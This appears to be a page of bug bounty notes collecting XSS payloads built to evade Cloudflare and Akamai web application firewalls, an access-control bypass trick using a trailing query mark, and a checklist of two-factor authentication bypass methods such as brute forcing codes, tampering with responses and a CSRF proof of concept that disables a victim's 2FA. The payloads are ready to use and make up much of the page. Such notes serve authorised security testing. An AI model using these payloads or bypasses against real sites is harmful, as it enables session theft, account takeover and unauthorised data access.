Bug Bounty Notes

Bug Bounty 💀

Bypass XSS

Cloudflare WAF:

encoded payload:

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt;
&lt;Img Src=OnXSS OnError=alert(1)&gt;

Clean Payload:

"><track/onerror='confirm`1`'>
"><svg+onload=confirm(cookie)>

XSS without parentheses (inside an anchor tag):

javascript:var{a:onerror}={a:alert};throw%20document.domain

HTML entity & URL encoding:

" --> &#34; 
> --> &gt; 
< --> &lt;
' --> &#x27;
` --> \%60

TIP:

<Img Src=javascript:alert(1)> is not used anymore
instead append "OnError=location=src"
eg.: https://example.com/file.php?url=<Img Src=javascript:alert(1)+OnError=location=src>

Akamai WAF

encoded payload:

&lt;A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)&gt;

code snippet:

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol 
          contenteditable
          onbeforeinput='location=b.value+c.value+d.value'>
click and write here!

Bypass access control restrictions

POC:

https://targetdomain/api/endpoint <-- Access Denied

https://targetdomain/api/endpoint/? <--- Access to entire customer database

2FA Bypass Techniques

2FA Code Leakage in Response:

You can intercept otp using burpsuite and inspect http response and check if the 2FA code leaked.

JS File Analysis:

Analyze all the JS Files that are referred in the response to see if any JS file contains information that can help bypass 2FA code.

Lack of brute-force Protection:

a. Type 2FA code and capture request using burpsuite.
b. Send request to intruder and send request for 100-200 times.
c. At 2FA Code Verification page, try to brute-force for valid 2FA and see if there is any success

Missing 2FA Code Integrity Validation:

a. Request a 2FA code from the attacker's account.
b. Use this valid 2FA code in the victim 2FA Request and see if it bypasses the 2FA protection.

2FA Refer Check Bypass:

a. Navigate to the page which comes after 2FA or any other authenticated page of the application.
b. If there is no success, change the refer header to the 2FA page URL.

Enabling 2FA Doesn't Expire Previous Session:

In this scenario, if an attacker hijacks an active session before 2FA, it is possible to carry out all functions without a need for 2FA.

Clickjacking on 2FA Disable Feature:

Try to iframe the page where the application allows a user to disable 2FA.

Response Manipulation:

a. Check response of the 2FA Request.
b. If you observe "Success": false, change this to "Success":true and see if it bypasses the 2FA.

Status Code Manipulation:

a. If the Response Status Code is 4xx like 401, 402, etc.
b. Change the response Status Code to "200 OK" and see if it bypasses the 2FA.

2FA Code Reusability:

a. Request a 2FA code and use it.
b. Now, re-use the same 2FA code in another session and if it authenticated successfully, that's a potential issue.

CSRF on 2FA Disable Feature:

a. Navigate to 2FA Page and click on "Disable 2FA" and capture this request with Burp Suite & generate a CSRF POC.
b. Send this PoC to the victim, and check if CSRF happens successfully and remove the 2FA from the victim account.

PreviousServer setup for Bug Bounty NextInteresting command

Last updated 1 year ago

Was this helpful?